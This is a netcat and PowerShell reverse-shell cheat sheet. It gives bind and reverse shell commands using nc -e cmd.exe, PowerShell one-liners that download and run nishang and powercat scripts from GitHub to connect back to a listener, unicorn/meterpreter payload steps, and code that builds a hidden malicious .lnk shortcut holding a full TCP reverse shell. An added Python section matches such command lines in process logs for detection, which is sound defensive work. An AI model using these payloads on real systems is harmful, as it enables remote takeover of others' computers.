NC Reverse Shell
Attack scenario:
Victim IP: 192.168.2.10
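Attacker IP: 192.168.2.11
Bind Shell
We want to obtain a shell on the Victim, using the following commands:
Victim: nc -lvp 9999 -e cmd.exe
Attacker: nc 192.168.2.10 9999
Note: first open a cmd service on the compromised host, then connect to it from the attacking machine.
Reverse Shell
Attacker: nc -vlp 9999
Victim: nc 192.168.2.11 9999 -e cmd.exe
Note: first start a listener on the attacking machine, then have the compromised host open a cmd for the Attacker.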
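PowerShell Reverse Shell
Reverse shell
Listening host: nc -vlp 9999
Executed on the target: the remote script is loaded in memory, which is equivalent to remote code execution. In the commands below, 監聽主機ip is a placeholder for the listening host's IP address.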
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 監聽主機ip -Port 9999"
powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 監聽主機ip -p 9999 -e cmd.exe"
python unicorn.py windows/meterpreter/reverse_http 17.10.0.1 4455
msfconsole -r unicorn.rc
Generating a payload shortcut with PowerShell
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\lnk_tests\payload.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '-windowstyle hidden /c $client = New-Object System.Net.Sockets.TCPClient("""192.168.1.10""",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + """PS """ + (pwd).Path + """> """;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Shortcut.Save()
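Detection side of the command lines above, as an added example that is not part of the original page: a Python triage pass over process-creation command lines (for instance the CommandLine field of Sysmon Event ID 1 or Security event 4688). The rule names, regexes and sample records are constructed for illustration and assume command-line logging is enabled.

```python
import re

# Constructed rule names; each regex captures one trait of the command lines above.
RULES = {
    "nc_exec_shell": re.compile(
        r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+\S*(?:cmd|powershell)", re.I),
    "powercat_exec": re.compile(r"\bpowercat\b.*\s-e\s+\S+", re.I),
    "ps_policy_bypass": re.compile(
        r"powershell(?:\.exe)?\b.*\s-(?:ep|exec(?:utionpolicy)?)\s+bypass", re.I),
    "ps_download_cradle": re.compile(r"\bIEX\b.*\bDownloadString\s*\(", re.I),
    "ps_hidden_window": re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I),
    "ps_raw_tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.I),
}

# Constructed process-creation records: (host, CommandLine field).
SAMPLE_EVENTS = [
    ("WS-01", "nc 192.168.2.11 9999 -e cmd.exe"),
    ("WS-02", 'powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient)'
              '.DownloadString(\'https://example.invalid/x.ps1\')"'),
    ("WS-03", 'powershell.exe -windowstyle hidden /c $client = New-Object '
              'System.Net.Sockets.TCPClient("192.0.2.10",4444)'),
    ("WS-04", r"powershell.exe -File C:\scripts\backup.ps1"),  # benign
    ("WS-05", "nc -vz 192.168.2.10 443"),                      # port check, no -e
]


def classify(command_line):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))


def triage(events):
    """Return (host, matched_rules) for each event that matches any rule."""
    findings = []
    for host, command_line in events:
        hits = classify(command_line)
        if hits:
            findings.append((host, hits))
    return findings


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

Substring rules like these miss encoded or obfuscated command lines, so they work best alongside PowerShell script block logging and egress monitoring.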